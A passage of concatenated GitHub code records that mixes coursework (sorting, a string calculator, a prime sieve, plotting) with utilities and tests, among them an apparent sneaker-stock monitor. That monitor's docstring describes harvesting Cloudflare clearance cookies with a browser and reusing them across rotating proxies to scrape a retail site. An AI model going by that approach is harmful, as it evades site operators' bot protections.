r\n #stores comparisons made in comp1 and comp2\n l, comp1 = mergesort(arr[(len(arr) // 2):], ordering)\n r, comp2 = mergesort(arr[:(len(arr) // 2)], ordering)\n #sorts and merges all together using merge\n #stores new list in result\n #stores comparisons made by merge in comp\n result, comp = merge(l, r, ordering)\n #adds all comparisons together\n comp = comp + comp1 + comp2\n #returns the sorted list along with comparisons made\n return (result, comp)\ndef alphabetize(roster, ordering):\n \"\"\"\n Alphabetizes the roster according to the given ordering\n :param roster: a list of people\n :param ordering: a function comparing two elements\n :return: a sorted version of roster\n :return: the number of comparisons made\n \"\"\"\n # check if already sorted\n if is_alphabetized(roster, ordering):\n #if so, return right away\n return (list(roster), 0)\n # if not then do a mergesort,\n roster, comp = mergesort(roster, ordering)\n # return sorted list and # of comparisons\n return (list(roster), comp)\n","repo_name":"SpudMSU/Classwork","sub_path":"CSE331/Alphabatizer.py","file_name":"Alphabatizer.py","file_ext":"py","file_size_in_byte":5090,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"15653314031","text":"import re\n\ndef add(numberstring):\n\n \"\"\" This function inputs a sequence of numbers written \n in a string format. It then returns the sum of all the numbers\n within the sequence. It does not include numbers \n that are greater than or equal to 1000. It throws an exception for any sequence\n that contains a negative number. The string calclulator \n handle strings of the following format:\n 1) returns an empty string as the number 0.\n 2) multiple delimeters in the form \"//[delimeter]\\n...\" or \"//[&][^]...\\n...\"\n 3) sequences with new line characters \"\"\"\n\n extracted_string = extracting_numbers_from_the_string(numberstring)\n sum_of_string_numbers = addition_of_extracted_strings(extracted_string)\n \n return sum_of_string_numbers\n\ndef extracting_numbers_from_the_string(numberstring):\n if numberstring == \"\": #empty strings return a zero\n extracted_string = '0'\n \n elif re.search(r\"(\\[.\\])\", numberstring): #matches '//[&][*][$]\\n...&' \n extracted_string = re.findall(r\"\\d+\", numberstring)\n \n elif re.match(r\"(\\/\\/.+\\n)\", numberstring): #matches \"//[delimeter]\\n245;145;245;2000\" \n delimeter_string = re.findall(r\"((?<=\\/\\/).*?(?=\\n))\", numberstring)\n y = delimeter_string[0] #convert delimeter_string into a string that can be handled by the extracted_string regex\n extracted_string = re.findall(r\"((?<=\\n)[-+]?\\d+(?=%s)|(?<=%s)[-+]?\\d+(?=%s)|(?<=%s)[-+]?\\d+)\" %(y,y,y,y), numberstring) #this regular expression also uses\n \n elif re.match(r\"(^(\\d+|-\\d+))\", numberstring): #matches '-52, 1\\n5, 1, 1'\n extracted_string = re.findall(r\"(-\\d+|\\d+)\", numberstring)\n \n return extracted_string\n \ndef addition_of_extracted_strings(extracted_string): #handles string of numbers extracted from different formats\n negativenumbers = re.findall(r\"-\\d+\", str(extracted_string))\n sum_of_string_numbers = 0\n for number in extracted_string:\n \n if int(number) < 0: #no negative numbers allowed\n raise Exception(\"Negatives: \" + str(negativenumbers) + \" Not Allowed\" )\n \n elif int(number) < 1000: #numbers larger than 1000 ignored\n sum_of_string_numbers = sum_of_string_numbers + int(number)\n \n return sum_of_string_numbers\n\nif __name__ == \"__main__\":\n \n numberstring = '//[&][*][$]\\n1*56$1&'\n print(add(numberstring)) \n","repo_name":"HlobisileMlebuka/StringCalculator","sub_path":"strcalculator.py","file_name":"strcalculator.py","file_ext":"py","file_size_in_byte":2579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"32593728827","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Feb 25 08:00:53 2022\n\n@author: tandeitnik\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nsteps = 2\n\nseed_x = [0,0,1]\nseed_y = [0,1,1]\n\n#plt.plot(seed_x,seed_y)\n\nfor step in range(steps):\n\n seed_x_temp = [0]\n seed_y_temp = [0]\n \n sign = 1\n \n for i in range(len(seed_x)-1):\n \n \n x_0 = [seed_x[i],seed_x[i+1]]\n y_0 = [seed_y[i],seed_y[i+1]]\n\n scale = np.cos(45*np.pi/180)\n\n \n x_1 = [x_0[0],x_0[0]+scale*((x_0[1]-x_0[0])*np.cos(sign*45*np.pi/180) -(y_0[1]-y_0[0])*np.sin(sign*45*np.pi/180))]\n y_1 = [y_0[0],y_0[0]+scale*((x_0[1]-x_0[0])*np.sin(sign*45*np.pi/180) +(y_0[1]-y_0[0])*np.cos(sign*45*np.pi/180))]\n \n\n \n seed_x_temp.append(x_1[1])\n seed_y_temp.append(y_1[1])\n \n sign = sign*(-1)\n \n\n \n seed_x_temp.append(seed_x[i+1])\n seed_y_temp.append(seed_y[i+1])\n \n\n \n seed_x = seed_x_temp\n seed_y = seed_y_temp\n \nplt.plot(seed_x,seed_y)\nplt.axis('off')\nplt.gca().set_aspect('equal', adjustable='box')\nplt.tight_layout()\n","repo_name":"tandeitnik/Beautiful-math","sub_path":"dragon_curve.py","file_name":"dragon_curve.py","file_ext":"py","file_size_in_byte":1153,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"} +{"seq_id":"11157586808","text":"def is_prime(N):\r\n N += 1\r\n A = [True] * N\r\n A[0] = A[1] = False\r\n for k in range(2, int(N**0.5)):\r\n if A[k]:\r\n for m in range(2*k, N, k):\r\n A[m] = False\r\n return [k for k in range(N) if A[k]]\r\n\r\n\r\nwhile True:\r\n try:\r\n N = int(input(\"Введите целое число N: \"))\r\n print(\"Простые числа от 2 до N:\", *is_prime(N))\r\n exit(0)\r\n except (TypeError, ValueError) as e:\r\n print(\"Что-то сломалось, введите число заново!\", e)","repo_name":"ArstanbekovTamerlan/Lecture03","sub_path":"zadanie 1.py","file_name":"zadanie 1.py","file_ext":"py","file_size_in_byte":560,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"22651561459","text":"\"\"\"\nUse playwright chrome browser to gen cloudflare cookies.\nPass it to httpx and go crazy.\n\nSKU can be grabbed from link.\n On the ATC btn.\n Base 64 encoded sku.\n\nProxy apparently does not need to stay the same as cookie.\n\nGrab CF cookies from browser, or use manual gotten cookies.\nGo to urls in file\nwebhook if item is found\n\"\"\"\nimport asyncio\nimport functools\nfrom asyncio import sleep\nfrom random import randint, choice\nfrom time import time\nfrom typing import Union\n\nimport aiohttp\nimport ray as ray\nfrom bs4 import BeautifulSoup\n\nimport httpx\nfrom ray.thirdparty_files import psutil\n\nfrom utils.base import Base\nfrom utils.global_vars import GLOBAL\nfrom utils.tools import print_req_info, update_title, auth, send_req\nfrom utils.webhook import send_webhook\n\n\nREQ_COUNTER = set()\nREQ_COUNTER_SEM = asyncio.Semaphore(1)\nCURRENT_PROXIES = []\nSENT_WEBHOOKS = {}\n\n\nasync def update_timer():\n # add to req_counter. update title\n REQ_COUNTER.add(time())\n for _time in REQ_COUNTER.copy():\n if time() - _time > 1:\n REQ_COUNTER.discard(_time)\n update_title(f'Checks in Last (1) Second: [{len(REQ_COUNTER)}]')\n return\n\n\ndef is_available(res: httpx.Response):\n if res.text.find('\"availability\": \"http://schema.org/InStock\"') != -1:\n return True\n\n\nclass FTLAEMonitor(Base):\n def __init__(self, link, webhook_client, webhook_sem):\n super().__init__()\n self.counter.tasks += 1\n self.task_num = self.counter.tasks\n\n self.link: str = link\n self.webhook_client = webhook_client\n self.webhook_sem = webhook_sem\n self.headers: dict = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0'\n }\n\n self.price, self.product_name, self.image_link, self.resp, self.sku = (None for _ in range(5))\n self.client: Union[httpx.AsyncClient, None] = None\n self.cf_cookie: Union[str, None] = None\n\n async def create_client(self):\n if not self.client:\n self.client = httpx.AsyncClient(proxies=choice(GLOBAL.isps))\n # self.client.cookies.set(name='cf_clearance', value='dzLUHkun0DVyOijQXA1q8bvWHtQ5714lEr4CDPofgzc')\n\n async def close_client(self):\n if self.client:\n await self.client.aclose()\n self.client = None\n\n async def set_product(self):\n src = BeautifulSoup(self.resp.text, 'lxml')\n src = src.select('script[type=\"application/ld+json\"]')\n src = eval(src[1].string)\n self.product_name = src['name']\n self.image_link = src['image']\n self.sku = src['sku']\n self.price = f\"{src['offers']['price']} {src['offers']['priceCurrency']}\"\n\n async def check_page(self):\n req = httpx.Request(\n method='GET',\n url=self.link,\n headers=self.headers,\n cookies=self.client.cookies\n )\n self.resp = await send_req(functools.partial(self.client.send, req))\n if not self.resp:\n self.warn('No Resp')\n return\n\n results = await asyncio.gather(*(self.is_available(), update_timer()))\n\n self.debug(f'Checked - {self.resp.status_code}')\n\n if any(results):\n return True\n\n async def is_available(self):\n if not is_available(self.resp):\n # if not available and was previously pushed.\n async with self.webhook_sem:\n if SENT_WEBHOOKS.get(self.sku, None):\n self.debug('Product has been pulled!')\n await self.send_webhooks('PULLED')\n SENT_WEBHOOKS.pop(self.sku)\n return True\n return\n\n await self.set_product()\n\n async with self.webhook_sem:\n if not SENT_WEBHOOKS.get(self.sku, None):\n self.debug('New Webhook! Sending Now!')\n await self.send_webhooks('NO_REPEAT')\n SENT_WEBHOOKS[self.sku] = time()\n\n if SENT_WEBHOOKS.get(self.sku, None):\n if time() - SENT_WEBHOOKS[self.sku] < GLOBAL.reminder_timeout:\n self.debug('Already Sent Webhook Within Timeout Period')\n return\n if time() - SENT_WEBHOOKS[self.sku] > GLOBAL.reminder_timeout:\n self.debug('Already Sent Webhook. But Timeout period has been exceeded.')\n await self.send_webhooks('REPEAT')\n SENT_WEBHOOKS[self.sku] = time()\n return\n\n async def send_webhooks(self, message):\n await asyncio.gather(*(send_webhook(caller=self,\n url=link,\n message=message)\n for link in GLOBAL.webhooks))\n\n async def run(self):\n await self.create_client()\n while True:\n if not await self.check_page():\n continue\n await self.is_available()\n break\n await self.close_client()\n\n\n# @todo - need to make sure only one of these run at a time\n\nasync def check_auth():\n # print('Inside _check_auth()')\n while True:\n auth()\n await sleep(60)\n\n\n# @ray.remote(num_cpus=1)\n# def check_auth():\n# print('Inside check_auth()')\n# asyncio.run(_check_auth())\n\n\n# num_cpus = psutil.cpu_count(logical=True)\n\n\n# @ray.remote(num_cpus=num_cpus)\n# class AsyncActor:\nasync def run():\n print('Inside AsyncActor')\n webhook_client = aiohttp.ClientSession()\n webhook_sem = asyncio.Semaphore(1)\n tasks = [\n FTLAEMonitor(\n link,\n webhook_client=webhook_client,\n webhook_sem=webhook_sem\n ).run()\n for link in GLOBAL.links\n ]\n try:\n await asyncio.gather(*tasks, check_auth())\n finally:\n await webhook_client.close()\n\n\nif __name__ == \"__main__\":\n asyncio.run(run())\n","repo_name":"lafftar/FTLAEMonitor","sub_path":"utils/sku_monitor.py","file_name":"sku_monitor.py","file_ext":"py","file_size_in_byte":5975,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"20890835330","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n\n__author__ = '赖富玉'\n\nimport os\nimport pdfkit\nimport logging\n\nfrom django.conf import settings\n\nlogger = logging.getLogger('mylogger')\n\n# 批量创建目录\ndef mkdirs_in_batch(path):\n try:\n path = os.path.normpath(path) # 去掉路径最右侧的 \\\\ 、/\n path = path.replace('\\\\', '/') # 将所有的\\\\转为/,避免出现转义字符串\n head, tail = os.path.split(path)\n if not os.path.isdir(path) and os.path.isfile(path): # 如果path指向的是文件,则分解文件所在目录\n head, tail = os.path.split(head)\n\n if tail == '': # head为根目录,形如 / 、D:\n return True\n\n new_dir_path = '' # 存放反转后的目录路径\n root = '' # 存放根目录\n while tail:\n new_dir_path = new_dir_path + tail + '/'\n head, tail = os.path.split(head)\n root = head\n else:\n new_dir_path = root + new_dir_path\n\n # 批量创建目录\n new_dir_path = os.path.normpath(new_dir_path)\n head, tail = os.path.split(new_dir_path)\n temp = ''\n while tail:\n temp = temp + '/' + tail\n dir_path = root + temp\n if not os.path.isdir(dir_path):\n os.mkdir(dir_path)\n head, tail = os.path.split(head)\n return True\n except Exception as e:\n logger.error('批量创建目录出错:%s' % e)\n return False\n\n\ndef string_hump_to_underline(src_string):\n '''\n 字符串 驼峰式转下划线分割式\n 例子:MyExamp -> my_examp\n '''\n\n for char in src_string[0:]:\n if ord(char) != ord(char.lower()): # 大写字母\n src_string = src_string.replace(char, '_' + char.lower())\n\n src_string = src_string.lstrip('_')\n return src_string\n\n\ndef html_str_to_pdf_file(html_str, file_name):\n '''由html字符串生成pdf'''\n\n try:\n config = pdfkit.configuration(wkhtmltopdf=settings.WKHTMLTOPDF)\n file_dir = settings.MEDIA_ROOT.rstrip('/') + '/sprint/testreport'\n if not os.path.exists(file_dir):# 路径不存在\n if not mkdirs_in_batch(file_dir):\n return [False,'生成报告失败:批量创建路径(%s)对应的目录失败' % file_dir]\n\n options = {'dpi': 300, 'image-dpi':600, 'page-size':'A3', 'encoding':'UTF-8', 'page-width':'1903px'}\n pdfkit.from_string(html_str, '%s/%s' % (file_dir, file_name), configuration=config, options=options)\n file_absolute_path = '%s/%s' % (file_dir, file_name)\n return [True, file_absolute_path]\n except Exception as e:\n msg = '生成迭代测试报告出错:%s' % e\n logger.error(msg)\n return [False, msg]\n","repo_name":"themycode/test-management-platform","sub_path":"backend/utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2817,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"6617240726","text":"def common_words(first, second):\n f = set(first.split(\",\"))\n s = set(second.split(\",\"))\n\n i = list(sorted(f.intersection(s)))\n\n return \",\".join(i)\n\nif __name__ == '__main__':\n # These \"asserts\" using only for self-checking and not necessary for auto-testing\n assert common_words(\"hello,world\", \"hello,earth\") == \"hello\", \"Hello\"\n assert common_words(\"one,two,three\", \"four,five,six\") == \"\", \"Too different\"\n assert common_words(\"one,two,three\", \"four,five,one,two,six,three\") == \"one,three,two\", \"1 2 3\"\n print(\"Coding complete? Click 'Check' to review your tests and earn cool rewards!\")\n","repo_name":"charlysparks/checkio","sub_path":"Empire of Code/common_words.py","file_name":"common_words.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"24627872097","text":"import random\n\ninfinity = float(\"inf\")\n\nknockdown_command_action = {\"name\": \"Knockdown\", \"uninterruptible\": True,\n \"next action\": {\"name\": \"Standup\", \"uninterruptible\": True}}\nheavy_damaged_command_action = {\"name\": \"HeavyDamaged\", \"uninterruptible\": True}\ndamaged_command_action = {\"name\": \"Damaged\", \"uninterruptible\": True}\n\n\ndef cal_loss(self, target, final_dmg, final_morale_dmg, leader_dmg, element_effect):\n \"\"\"\n :param self: Attacker Subunit object\n :param target: Damage receiver Subunit object\n :param final_dmg: Damage value to health\n :param final_morale_dmg: Damage value to morale\n :param leader_dmg: Damage value to leader inside target subunit\n :param element_effect: Dict of element effect inflict to target\n \"\"\"\n if final_dmg > target.subunit_health: # dmg cannot be higher than remaining health\n final_dmg = target.subunit_health\n\n if final_dmg > target.max_health10:\n target.interrupt_animation = True\n target.command_action = knockdown_command_action\n\n target.one_activity_limit = target.max_health / final_dmg * 10\n\n elif final_dmg > target.max_health5:\n target.interrupt_animation = True\n target.command_action = heavy_damaged_command_action\n\n elif final_dmg > target.max_health1: # play damaged animation\n target.interrupt_animation = True\n target.command_action = damaged_command_action\n\n target.subunit_health -= final_dmg\n health_check = 0.1\n if target.max_health != infinity:\n health_check = 1 - (target.subunit_health / target.max_health)\n target.base_morale -= (final_morale_dmg + self.morale_dmg_bonus) * target.mental * health_check\n target.stamina -= self.stamina_dmg_bonus\n\n if target.red_border is False: # add red colour to indicate taking damage\n target.block_image.fill((200, 50, 50))\n target.red_border = True\n\n for key, value in element_effect.items():\n target.element_status_check[key] += round(final_dmg * value * (100 - target.element_resistance[key] / 100))\n\n # self.base_morale += round((final_morale_dmg / 5)) # recover some morale when deal morale dmg to enemy\n\n if target.leader is not None and target.leader.health > 0 and random.randint(0,\n 10) > 9: # dmg on subunit leader, only 10% chance\n final_leader_dmg = round(leader_dmg - (leader_dmg * target.leader.combat / 101))\n if final_leader_dmg > target.leader.health:\n final_leader_dmg = target.leader.health\n target.leader.health -= final_leader_dmg\n","repo_name":"robgamerz19/Masendor","sub_path":"gamescript/common/subunit/cal_loss.py","file_name":"cal_loss.py","file_ext":"py","file_size_in_byte":2642,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"83"} +{"seq_id":"27197537717","text":"import requests\n\nURL = 'http://localhost:3000/articles'\nSAMPLE_DOCUMENTS = [\n {\n \"_id\": \"645e1d7e4a17aac61d9e881f\",\n \"title\": \"REST\",\n \"content\": \"REST is short for Representational State Transfer. It's a architectural style for designing APIs\"\n },\n {\n \"_id\": \"5c1398aad79ac8eac11e7561\",\n \"title\": \"Bootstrap\",\n \"content\": \"This is a framework developed by Twitter that contains pre-made front-end templates for web design\"\n },\n {\n \"_id\": \"5c1398ecd79ac8eac11e7567\",\n \"title\": \"DOM\",\n \"content\": \"The Document Object Model is like an API for interacting with our HTML\"\n },\n {\n \"_id\": \"645e2ebf7f6b693014fd5967\",\n \"title\": \"example title\",\n \"content\": \"example content\",\n \"__v\": 0\n }\n]\n\nupdateContent: str = \"\"\"Chuck Norris delights in having BLT sandwiches for lunch! \nBut understandably his BLT's are made of barracuda, Leaches & Tarantulas nn buttered Texas Toast.\"\"\"\n\n\ndef postSampleArticles():\n responses: list = [requests.post(URL, data={\n \"title\": document[\"title\"], \"content\": document[\"content\"]}) for document in SAMPLE_DOCUMENTS]\n return responses\n\n\ndef postOneSampleArticle():\n payload = {'title': 'example title', 'content': 'example content'}\n responses: str = requests.post(URL, data=payload)\n return responses\n\n\ndef deleteAllArticlesFromCollection():\n response = requests.delete(URL)\n return response\n\n\ndef putUpdateArticle():\n payload = {'title': 'REST', \"content\": \"xxxxxxxxxxxxxxxx\"}\n response = requests.put(URL+\"/REST\", data=payload)\n return response, response.text\n\n\ndef patchUpdateArticle(targetArticleTitle: str = \"TEST\", newTitle: str = None, newContent: str = None):\n if newTitle:\n payload = {'title': newTitle}\n elif newContent:\n payload = {'content': newContent}\n response = requests.patch(URL+\"/\"+targetArticleTitle, data=payload)\n return response, response.text\n\n\ndef deleteArticle(targetArticleTitle: str = \"TEST\"):\n payload = {'title': targetArticleTitle}\n response = requests.delete(URL+\"/\"+targetArticleTitle, data=payload)\n return response, response.text\n","repo_name":"caiolauro/wikiAPI","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":2205,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"17855894014","text":"n=int(input())\nresult=[]\nfor i in range(n):\n t=int(input())\n nl=list(map(int,input().split()))\n i=0\n j=1\n ans=[]\n while j < t:\n if abs(nl[j] - nl[i]) > 1:\n ans.append(\"NO\")\n else:\n ans.append(\"YES\")\n i += 1\n j += 1\n if \"NO\" in ans:\n result.append(\"NO\")\n else:\n result.append(\"YES\")\nfor i in result:\n print(i)\n","repo_name":"Habelaz/a2sv","sub_path":"remove_smallest.py","file_name":"remove_smallest.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"73016142350","text":"from pprint import pprint\n\nimport db\n\nTABLE_NAME = 'market_announcement'\nKEY_NAME = 'COID'\nKEY_VALUE = 'TPEX'\n\n\nif __name__ == '__main__':\n print(f\"{TABLE_NAME} from {KEY_VALUE}\")\n for item in db.query_items_by_pkey(TABLE_NAME, KEY_NAME, KEY_VALUE):\n pprint(item)\n","repo_name":"martinliou/data_analysis","sub_path":"TPEXAnnouncement/query_pk.py","file_name":"query_pk.py","file_ext":"py","file_size_in_byte":277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"37089595771","text":"import cv2\nimport os\nimport numpy as np\nimport computer_vision.src.image_proc as func\n\n\ndef pipeline(path_imgs, path_save, segmentation=1):\n \"\"\"\n Pipeline do projeto\n Arguments:\n path_imgs: str -- caminho para a pasta das imagens\n path_save: str -- caminho para salvar os resultados\n segmentation: int -- 1: Limiar de Otsu\n 2: Sobel\n 3: Canny\n\n Return:\n \"\"\"\n\n files_ = os.listdir(path_imgs)\n #width = 960\n #height = 1280\n scale_percent = 30 # percent of original size\n width = int(960 * scale_percent / 100)\n height = int(1280 * scale_percent / 100)\n\n dim = (width, height)\n\n area = []\n lar_max = []\n comp_max = []\n largura = []\n comprimento = []\n name = []\n\n for f in files_:\n name.append(f)\n print(f'[INFO] name: {f}')\n img = cv2.imread(path_imgs + f)\n resized = cv2.resize(img, dim, interpolation=cv2.INTER_AREA)\n gray = cv2.cvtColor(resized, cv2.COLOR_RGB2GRAY)\n\n if segmentation == 1:\n seg = func.open_otsu(gray)\n\n elif segmentation == 2:\n seg = func.subtract_sobel(gray)\n\n elif segmentation == 3:\n seg = func.subtract_canny(gray)\n\n func.plot_and_save(resized, seg, path_save, f.split('.')[0])\n\n l = func.largura_folha(seg)\n c = func.comprimento_folha(seg)\n area.append(func.area_folha(seg))\n largura.append(l)\n comprimento.append(c)\n\n lar_max.append(np.argmax(l))\n comp_max.append(np.argmax(l))\n\n func.dataframe_csv(name, area, lar_max, comp_max, 'data_valueMax.csv')\n func.dataframe_csv(name, area, largura, comprimento, 'dataframe_final.csv')\n\n\ndef main():\n path = 'images/'\n path_save = 'data/'\n pipeline(path, path_save)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"andrerodrig/cognitive-computing-projects","sub_path":"computer_vision/release/ap1.py","file_name":"ap1.py","file_ext":"py","file_size_in_byte":1887,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"83"} +{"seq_id":"70412499791","text":"#!/usr/bin/env python\n# _*_coding:utf-8_*_\nimport time\n\nimport tornado\nimport tornado.gen\n\nfrom api.apiWebSocket import ApiDeviceSocketHandler\nfrom handlers.base import BaseHandler\nfrom handlers.basefunction import BaseFunctionHandler\nfrom models.models import MyTask, MyTaskContent\n\n\n# 任务列表\nclass MyTaskHandler(BaseHandler):\n @tornado.web.authenticated\n def get(self):\n my_tasks = self.session.query(MyTask).filter(MyTask.company_id == self.get_secure_cookie('company_id')).order_by(MyTask.id.desc()).all()\n self.render(\"task_list.html\", auth_user=self.current_user, my_tasks=my_tasks)\n\n\n# 任务详细\nclass MyTaskDetailHandler(BaseHandler):\n @tornado.web.authenticated\n def get(self):\n my_task_id = self.get_argument(\"my_task_id\")\n my_task = self.session.query(MyTask).filter(MyTask.id == my_task_id).first()\n my_task_contents = my_task.my_task_content\n self.render(\"task_detail.html\", auth_user=self.current_user, my_task_contents=my_task_contents)\n\n\n# 任务列表--删除\nclass MyTaskDeleteHandler(BaseHandler):\n @tornado.web.authenticated\n def get(self):\n my_task_id = self.get_argument(\"my_task_id\")\n my_task = self.session.query(MyTask).filter(MyTask.id == my_task_id).first()\n self.session.delete(my_task)\n self.session.commit()\n self.redirect('/myTask')\n\n\n# 推送--定时开关机数据\nclass SendTimeSwitchHandler(BaseHandler):\n @tornado.web.authenticated\n def get(self):\n device_time_switch_id = self.get_argument(\"device_time_switch_id\")\n device_time_switch, week_list = BaseFunctionHandler.get_device_time_switch(self, device_time_switch_id)\n my_task = MyTask(\n name='定时开关机任务',\n type='time_switch',\n time=time.strftime(\"%Y-%m-%d %H:%M:%S\"),\n user_id=self.get_secure_cookie('user_id'),\n company_id=self.get_secure_cookie('company_id'),\n )\n self.session.add(my_task)\n self.session.commit()\n for device_group in device_time_switch.device_group:\n devices = device_group.device\n for device in devices:\n my_task_content = MyTaskContent(\n device_id=device.device_id,\n from_user=self.get_secure_cookie('username'),\n new_time=time.strftime(\"%Y-%m-%d %H:%M:%S\"),\n send_time=time.strftime(\"%Y-%m-%d %H:%M:%S\"),\n send_data=str(week_list),\n my_task_id=my_task.id\n )\n self.session.add(my_task_content)\n self.session.commit()\n ApiDeviceSocketHandler.send_to_many_device(devices, week_list)\n self.redirect('/myTask')\n\n\n# 推送--资源组数据\nclass SendPlaylistHandler(BaseHandler):\n @tornado.web.authenticated\n def get(self):\n res_group_id = self.get_argument('res_group_id')\n res_group, playlist = BaseFunctionHandler.get_res_group_by_res_group_id(res_group_id)\n my_task = MyTask(\n name='播放列表任务',\n type='playlist',\n time=time.strftime(\"%Y-%m-%d %H:%M:%S\"),\n user_id=self.get_secure_cookie('user_id'),\n company_id=self.get_secure_cookie('company_id'),\n )\n self.session.add(my_task)\n self.session.commit()\n device_groups = res_group.deviceGroup\n for device_group in device_groups:\n devices = device_group.device\n for device in devices:\n my_task_content = MyTaskContent(\n device_id=device.device_id,\n from_user=self.get_secure_cookie('username'),\n new_time=time.strftime(\"%Y-%m-%d %H:%M:%S\"),\n send_time=time.strftime(\"%Y-%m-%d %H:%M:%S\"),\n send_data=str(playlist),\n my_task_id=my_task.id\n )\n self.session.add(my_task_content)\n self.session.commit()\n ApiDeviceSocketHandler.send_to_many_device(devices, playlist)\n self.redirect('/myTask')\n\n\n# 推送--设备重启命令\nclass SendDeviceRestartHandler(BaseHandler):\n @tornado.web.authenticated\n def get(self):\n device_id = self.get_argument('device_id')\n my_task = MyTask(\n name='广告机重启',\n type='deviceRestart',\n time=time.strftime(\"%Y-%m-%d %H:%M:%S\"),\n user_id=self.get_secure_cookie('user_id'),\n company_id=self.get_secure_cookie('company_id'),\n )\n self.session.add(my_task)\n self.session.commit()\n data = [{'cmd': 'deviceRestart'}, {'data': 'restart'}]\n my_task_content = MyTaskContent(\n device_id=device_id,\n from_user=self.get_secure_cookie('username'),\n new_time=time.strftime(\"%Y-%m-%d %H:%M:%S\"),\n send_time=time.strftime(\"%Y-%m-%d %H:%M:%S\"),\n send_data=str(data),\n my_task_id=my_task.id\n )\n self.session.add(my_task_content)\n self.session.commit()\n ApiDeviceSocketHandler.send_to_one_device(device_id, data)\n self.redirect('/myTask')\n\n\n","repo_name":"xin1195/bcloud","sub_path":"handlers/myTask.py","file_name":"myTask.py","file_ext":"py","file_size_in_byte":5213,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"83"} +{"seq_id":"17479915409","text":"\n# def TwoSum(nums:list,target):\n# nums.sort()\n# begin = 0\n# end = len(nums) - 1\n# while begin < end:\n# sum = nums[begin] + nums[end]\n# if sum== target:\n# print(begin,end)\n# begin += 1\n# end -= 1\n# else:\n# if sum < target:\n# begin += 1\n# else:\n# begin -= 1\n\n\n# def TwoSum(nums,target):\n# for i in range(len(nums)):\n# for j in range(i + 1,len(nums)):\n# if nums[i] + nums[j] == target:\n# return i,j\n\ndef TwoSum(nums:list,target):\n d ={}\n for i in range(len(nums)):\n temp = target - nums[i]\n if temp in d:\n return d[temp],i\n d[nums[i]] = i\n\nnums = [1,4,3,5,2]\nprint(TwoSum(nums,6))","repo_name":"qixiaoxioa/data_structure","sub_path":"两数之和.py","file_name":"两数之和.py","file_ext":"py","file_size_in_byte":790,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"73661301710","text":"#! /usr/bin/env python3\n\n# standard library\nimport datetime\nimport os\n\n# testing libraries\nimport pytest\nfrom falcon import testing\nimport falcon\n\n# internal import\nimport backend.app\n\n# folder with json files for test\nCTA_TEST_DIR = 'tests/func/cta-fake-response-json/'\n\n\n@pytest.fixture()\ndef client():\n \"\"\"Create instance of Falcon testing client\n \"\"\"\n api = backend.app.create_app()\n return testing.TestClient(api)\n\n\nCTA_SUCCESS_JSON_RESP = (\n os.path.join(CTA_TEST_DIR, 'cta_success_fake_response.json')\n)\n\n\ndef test_get_successful_response(client, mocker, json_loader):\n # Arrange\n mock_datetime = mocker.patch.object(backend.cta, 'datetime')\n mock_datetime.datetime.now.return_value = (\n datetime.datetime(2017, 11, 14, 15, 56)\n )\n\n get_mock = mocker.MagicMock()\n get_mock.json.return_value = json_loader(\n CTA_SUCCESS_JSON_RESP\n )\n get_mock.status_code = 200\n request_mock = mocker.patch.object(\n backend.cta.requests,\n 'get',\n return_value=get_mock,\n )\n\n # Act\n response = client.simulate_get('/stops/1066')\n\n # Assert\n upcoming_buses = response.json['result']\n assert response.status == falcon.HTTP_200\n assert len(upcoming_buses) == 4\n assert upcoming_buses[0] == {'bus': '146', 'min_away': 3}\n assert upcoming_buses[1] == {'bus': '151', 'min_away': 10}\n\n args, kwargs = request_mock.call_args\n params = kwargs['params'].items()\n assert request_mock.call_count == 1\n assert ('stpid', '1066') in params\n assert ('format', 'json') in params\n\n\ndef test_404(client, mocker):\n # Arrange\n get_mock = mocker.MagicMock()\n get_mock.status_code = 404\n mocker.patch.object(\n backend.cta.requests,\n 'get',\n return_value=get_mock,\n )\n\n # Act\n response = client.simulate_get('/stops/1066')\n\n # Assert\n assert response.status == falcon.HTTP_200\n assert response.json == {'error': 'Request returned 404'}\n\n\ndef test_url_not_found(client, mocker):\n # Arrange\n mocker.patch.object(\n backend.cta.requests,\n 'get',\n side_effect=[ConnectionError]\n )\n\n # Act\n response = client.simulate_get('/stops/1066')\n\n # Assert\n assert response.status == falcon.HTTP_200\n assert response.json == {'error': 'URL not found'}\n\n\nCTA_ERROR_INCORRECT_STOP_JSON_RESP = (\n os.path.join(CTA_TEST_DIR, 'cta_error_incorrect_stop_response.json')\n)\n\n\ndef test_wrong_stop(client, mocker, json_loader):\n # Arrange\n get_mock = mocker.MagicMock()\n get_mock.status_code = 200\n get_mock.json.return_value = json_loader(\n CTA_ERROR_INCORRECT_STOP_JSON_RESP\n )\n mocker.patch.object(\n backend.cta.requests,\n 'get',\n return_value=get_mock,\n 